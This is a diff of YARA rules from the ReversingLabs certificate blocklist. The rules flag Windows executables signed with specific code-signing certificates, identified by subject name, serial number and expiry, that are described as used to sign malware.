 		author = "ReversingLabs"
-		id = "d164846d-9552-5108-8b01-1b4b3e7c0b60"
+		id = "4fcd4e89-658c-593b-8f94-edd5df19da6e"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12388-L12404"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6388-L6404"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "fa2a47f4fb822089fcc958850ce516c8c5d95a6d9b575f3b1d1d4a2ceb2537e4"
+		logic_hash = "9f1cc61b944974696113912bc1d1a0b45b9911fa4d6de382a48c0d22d2d20953"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23621,21 +46015,21 @@ rule REVERSINGLABS_Cert_Blocklist_6E889Bb3B7F7194B674C6A0335A608E0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CLEVERCONTROL LLC" and pe.signatures [ i ] . serial == "6e:88:9b:b3:b7:f7:19:4b:67:4c:6a:03:35:a6:08:e0" and 1646956800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hillcoe Software Inc." and pe.signatures [ i ] . serial == "01:4a:98:d6:97:b4:4f:43:de:d2:1f:18:eb:6a:d0:ba" and 1605364760 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0F62F760704Bdf8Dc30C7Baa7376F484 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_063A7D09107Eddd8Aa1F733634C6591B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "fe326fb9-fe1e-5fc9-8599-6b4cfd6506dd"
+		id = "0169cf47-72b0-53ec-bc8f-c2a80febad3a"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12406-L12422"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6406-L6422"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d54d52e116b9404782ce80664f218d2e142577dac672c53c41b82f0466c7375a"
+		logic_hash = "19f11e1d9ce95eb4bc75387a0118c230388a13cd07b02e00ea1d65cdcc0b2bd7"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23645,21 +46039,21 @@ rule REVERSINGLABS_Cert_Blocklist_0F62F760704Bdf8Dc30C7Baa7376F484 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shanghai XuSong investment partnership Enterprise(Limited)" and pe.signatures [ i ] . serial == "0f:62:f7:60:70:4b:df:8d:c3:0c:7b:aa:73:76:f4:84" and 1659398400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Smart Line Logistics" and pe.signatures [ i ] . serial == "06:3a:7d:09:10:7e:dd:d8:aa:1f:73:36:34:c6:59:1b" and 1605712706 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_071202Dbfda40B629C5E7Acac947C2D3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1E74Cfe7De8C5F57840A61034414Ca9F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4206c383-0e6d-5129-8e6a-05bd54c48e65"
+		id = "d7fd0c3f-0292-5d27-b8e6-559b829440b4"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12424-L12440"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6424-L6442"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "cc51b0ae6a59f68e61ee0b4ff33ea0e1ee9ef04e4c994e1c98da6befab62a5b9"
+		logic_hash = "d82220d908283f1707ec15882503b02cb8dc80095279a9e7d6cbdd113c25d8ae"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23669,21 +46063,21 @@ rule REVERSINGLABS_Cert_Blocklist_071202Dbfda40B629C5E7Acac947C2D3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Crossfire Industries, LLC" and pe.signatures [ i ] . serial == "07:12:02:db:fd:a4:0b:62:9c:5e:7a:ca:c9:47:c2:d3" and 1658620801 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Insta Software Solution Inc." and ( pe.signatures [ i ] . serial == "00:1e:74:cf:e7:de:8c:5f:57:84:0a:61:03:44:14:ca:9f" or pe.signatures [ i ] . serial == "1e:74:cf:e7:de:8c:5f:57:84:0a:61:03:44:14:ca:9f" ) and 1601733106 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_98Ab9585C04D7F0E4Cf4De98C14B684D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_75Cf729F8A740Bbdef183A1C4D86A02F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "445bb30e-e021-5a75-a47e-29fa567acfa5"
+		id = "e96fdf57-3884-526e-a704-93e783c95241"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12442-L12460"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6444-L6460"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ba43dd15b13623bb99d88c93fb9e751deb95a546325a1142d9137b25430d07fd"
+		logic_hash = "691fadaa653ecd29e60f2db39b7c5154d7c85f388f72eccd0a4b5fe42eaee0dd"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23693,21 +46087,21 @@ rule REVERSINGLABS_Cert_Blocklist_98Ab9585C04D7F0E4Cf4De98C14B684D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and ( pe.signatures [ i ] . serial == "00:98:ab:95:85:c0:4d:7f:0e:4c:f4:de:98:c1:4b:68:4d" or pe.signatures [ i ] . serial == "98:ab:95:85:c0:4d:7f:0e:4c:f4:de:98:c1:4b:68:4d" ) and 1656547200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Umbor LLC" and pe.signatures [ i ] . serial == "75:cf:72:9f:8a:74:0b:bd:ef:18:3a:1c:4d:86:a0:2f" and 1604223894 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4631713E66E91347F0388B98Cf747794 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2F64677254D3844Efdac2922123D05D1 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6c541522-98ab-5acb-af84-c005c9721e1f"
+		id = "de9ef02d-a723-5013-9f91-e394edc23855"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12462-L12478"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6462-L6478"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "cb517cda67150b7e17ee3bd946903e8e8eca81742a362032249a2f2387e71c50"
+		logic_hash = "f9f1f629e03563ece0fe5186b199e2f030dce7f58fb259de1aeb7387c76fa902"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23717,21 +46111,21 @@ rule REVERSINGLABS_Cert_Blocklist_4631713E66E91347F0388B98Cf747794 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\xB9\\xBF\\xE5\\xB7\\x9E\\xE6\\x98\\x8A\\xE5\\x8A\\xA8\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "46:31:71:3e:66:e9:13:47:f0:38:8b:98:cf:74:77:94" and 1488240000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ORGANICUP ApS" and pe.signatures [ i ] . serial == "2f:64:67:72:54:d3:84:4e:fd:ac:29:22:12:3d:05:d1" and 1605640092 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E963F8983D21B4C1A69C66A9D37498E5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_32Fbf8Cfa43Dca3F85Efabe96Dfefa49 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4cbc6cc9-1795-5d43-84a1-dd835d7ef349"
+		id = "22bd8590-7a95-564c-ad77-fb20569de51d"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12480-L12498"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6480-L6496"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b7c715e28f003351d10ba53657e9e667b635a0e4433276d91d26f4482a61191d"
+		logic_hash = "73d80e6a0dc2316524a55a9627792b9b4488d238ef529f1767de182956b0865e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23741,21 +46135,21 @@ rule REVERSINGLABS_Cert_Blocklist_E963F8983D21B4C1A69C66A9D37498E5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Max Steinhard" and ( pe.signatures [ i ] . serial == "00:e9:63:f8:98:3d:21:b4:c1:a6:9c:66:a9:d3:74:98:e5" or pe.signatures [ i ] . serial == "e9:63:f8:98:3d:21:b4:c1:a6:9c:66:a9:d3:74:98:e5" ) and 1656288000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Foxstyle LLC" and pe.signatures [ i ] . serial == "32:fb:f8:cf:a4:3d:ca:3f:85:ef:ab:e9:6d:fe:fa:49" and 1598255906 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6E44Fcedd49F22F7A28Cecc99104F61A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ef9D0Cf071D463Cd63D13083046A7B8D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b69a4e06-a732-5462-b2b1-bdde3fd34e31"
+		id = "8751f71b-0ebb-5820-927c-684a5ae5ee7b"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12500-L12516"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6498-L6516"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "caff0cbca45c0dffb673367585824783371f2f4e31a0c9629afb7de708098892"
+		logic_hash = "2923979811504f78a79a2480600285a2697845e51870a44ed231a81e79807121"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23765,21 +46159,21 @@ rule REVERSINGLABS_Cert_Blocklist_6E44Fcedd49F22F7A28Cecc99104F61A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "M-Trans Maciej Caban" and pe.signatures [ i ] . serial == "6e:44:fc:ed:d4:9f:22:f7:a2:8c:ec:c9:91:04:f6:1a" and 1672923378 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rubin LLC" and ( pe.signatures [ i ] . serial == "00:ef:9d:0c:f0:71:d4:63:cd:63:d1:30:83:04:6a:7b:8d" or pe.signatures [ i ] . serial == "ef:9d:0c:f0:71:d4:63:cd:63:d1:30:83:04:6a:7b:8d" ) and 1605358307 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_35B49Ee870Aea532E6Ef0A4987105C8F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_115Cf1353A0E33E19099A4867A4C750A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "88dedb69-52f4-59d3-b397-6a091a866cc5"
+		id = "c2564461-6731-5d7b-8dbb-560929b568d0"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12518-L12534"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6518-L6536"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a9d8e9db453f40e32a0cb6412db8885db54053fdf3d7908b884361a493f97b1f"
+		logic_hash = "2a3353c655531b113dc019a86288310881e3bbcb6c03670a805f22b185e09e6c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23789,21 +46183,21 @@ rule REVERSINGLABS_Cert_Blocklist_35B49Ee870Aea532E6Ef0A4987105C8F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kancelaria Adwokacka Adwokat Aleksandra Krzemi\\xC5\\x84ska" and pe.signatures [ i ] . serial == "35:b4:9e:e8:70:ae:a5:32:e6:ef:0a:49:87:10:5c:8f" and 1663151018 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "212 NY Gifts, Inc." and ( pe.signatures [ i ] . serial == "00:11:5c:f1:35:3a:0e:33:e1:90:99:a4:86:7a:4c:75:0a" or pe.signatures [ i ] . serial == "11:5c:f1:35:3a:0e:33:e1:90:99:a4:86:7a:4c:75:0a" ) and 1605515909 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_063Dcd7D7B0Bc77Cac844C7213Be3989 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5Cf3778Bb11115A884E192A7Cb807599 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1bf4b84b-4a32-5908-8ccb-9fce2e5944e6"
+		id = "cd643ad5-254a-5c53-a6f2-b263ff539cd3"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12536-L12552"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6538-L6556"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "091d00b0731f0a3d9917eee945249f001e4b5b1b603cad2fc21eed70ec86aa99"
+		logic_hash = "4242ef4a30bb09463ec5a6df9367915788a2aa782df6c463bcf966d2aad63c1d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23813,21 +46207,21 @@ rule REVERSINGLABS_Cert_Blocklist_063Dcd7D7B0Bc77Cac844C7213Be3989 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HANNAH SISK LIMITED" and pe.signatures [ i ] . serial == "06:3d:cd:7d:7b:0b:c7:7c:ac:84:4c:72:13:be:39:89" and 1656892801 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SLOMATIC d.o.o." and ( pe.signatures [ i ] . serial == "00:5c:f3:77:8b:b1:11:15:a8:84:e1:92:a7:cb:80:75:99" or pe.signatures [ i ] . serial == "5c:f3:77:8b:b1:11:15:a8:84:e1:92:a7:cb:80:75:99" ) and 1605006199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6F8777Aa866142Ad7120E5E1C9321E37 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_82Cb93593B658100Cdd7A00C874287F2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ace8a8b4-5288-56c4-bd47-9eb42ea41ecb"
+		id = "85df653a-a4a3-5d0e-86f4-cad0249cd3d3"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12554-L12570"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6558-L6576"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ca3ff0c7192ba90932d35d053712816555dea051ce15d29a7ccf4e37da989899"
+		logic_hash = "c77881e0365c9fc398097d0b6e077330a5f0fcbb53279bfde96b3c01df914c55"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23837,21 +46231,21 @@ rule REVERSINGLABS_Cert_Blocklist_6F8777Aa866142Ad7120E5E1C9321E37 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CLOUD SOFTWARE LINE CO., LTD." and pe.signatures [ i ] . serial == "6f:87:77:aa:86:61:42:ad:71:20:e5:e1:c9:32:1e:37" and 1629676800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sportsonline24 B.V." and ( pe.signatures [ i ] . serial == "00:82:cb:93:59:3b:65:81:00:cd:d7:a0:0c:87:42:87:f2" or pe.signatures [ i ] . serial == "82:cb:93:59:3b:65:81:00:cd:d7:a0:0c:87:42:87:f2" ) and 1605117874 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4A7F07C5D4Ad2E23F9E8E03F0E229Dd4 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_9A8Bcfd05F86B15D0C99F50Cf414Bd00 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "76be58d9-d1a3-5dec-807e-941714be80f9"
+		id = "4446aead-9505-545a-8d3a-6ad844d348d3"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12572-L12588"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6578-L6596"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6dc2bfac77117e294cacc772f7bfaea8b2e3caa26a0afd3729d517e91ca20ea5"
+		logic_hash = "803d70dddeff51b753b577ea196b12570847c6875ae676a2d12cf1ca9323be34"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23861,21 +46255,21 @@ rule REVERSINGLABS_Cert_Blocklist_4A7F07C5D4Ad2E23F9E8E03F0E229Dd4 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Danalis LLC" and pe.signatures [ i ] . serial == "4a:7f:07:c5:d4:ad:2e:23:f9:e8:e0:3f:0e:22:9d:d4" and 1608681600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AI Software a.s." and ( pe.signatures [ i ] . serial == "00:9a:8b:cf:d0:5f:86:b1:5d:0c:99:f5:0c:f4:14:bd:00" or pe.signatures [ i ] . serial == "9a:8b:cf:d0:5f:86:b1:5d:0c:99:f5:0c:f4:14:bd:00" ) and 1592442000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_F5F9C8F8C33E4Ce84Dd48Fcb03Ccb075 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_95E5793F2Abe0B4Ec9Be54Fd24F76Ae5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "74203aa1-e5d0-59d9-b9f8-b79f5fbe271e"
+		id = "6b992971-6a1f-53e3-8651-f25a6b761c41"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12590-L12608"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6598-L6616"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ac3bab3f5a93099f39b0862b419346d1eb3d0f75d86e121ba30626d496c46c57"
+		logic_hash = "bd198665ae952e11c91adc329908e3cd55a55365875200cd81d2f71fd092f1fe"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23885,21 +46279,21 @@ rule REVERSINGLABS_Cert_Blocklist_F5F9C8F8C33E4Ce84Dd48Fcb03Ccb075 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Abdulkadir \\xC5\\x9Eahin" and ( pe.signatures [ i ] . serial == "00:f5:f9:c8:f8:c3:3e:4c:e8:4d:d4:8f:cb:03:cc:b0:75" or pe.signatures [ i ] . serial == "f5:f9:c8:f8:c3:3e:4c:e8:4d:d4:8f:cb:03:cc:b0:75" ) and 1545004800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kommservice LLC" and ( pe.signatures [ i ] . serial == "00:95:e5:79:3f:2a:be:0b:4e:c9:be:54:fd:24:f7:6a:e5" or pe.signatures [ i ] . serial == "95:e5:79:3f:2a:be:0b:4e:c9:be:54:fd:24:f7:6a:e5" ) and 1604933746 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_57Fc55239F21F139978609E323097132 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_133565779808C3B79D8E3F70A9C3Ffac : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e71d575c-5a30-5158-80ee-3508cdaf5636"
+		id = "bc3f54a6-723d-5de5-9a59-2be8a005cedc"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12610-L12626"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6618-L6634"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "030bb847e524e672ee382e0284ba3f027920f60c70bbd153d4b9cdd2669e6a99"
+		logic_hash = "b9fb2e3cc150b0278e67c673f7c01174c30b2cc4458c9c5e573661071795b793"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -23909,21 +46303,21 @@ rule REVERSINGLABS_Cert_Blocklist_57Fc55239F21F139978609E323097132 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aidem Media Limited" and pe.signatures [ i ] . serial == "57:fc:55:23:9f:21:f1:39:97:86:09:e3:23:09:71:32" and 1501632000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Istok" and pe.signatures [ i ] . serial == "13:35:65:77:98:08:c3:b7:9d:8e:3f:70:a9:c3:ff:ac" and 1605019819 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Eeefec4308Abe63323600E1608F5E6F2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7E0Ccda0Ef37Acef6C2Ebe4538627E5C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "265f70f4-f8cf-52cf-8d9b-ddfefb8a1b79"
+		id = "4668ceb3-8bf2-5be4-9a1a-d0d902c35cf0"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12628-L12646"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L6636-L6654"
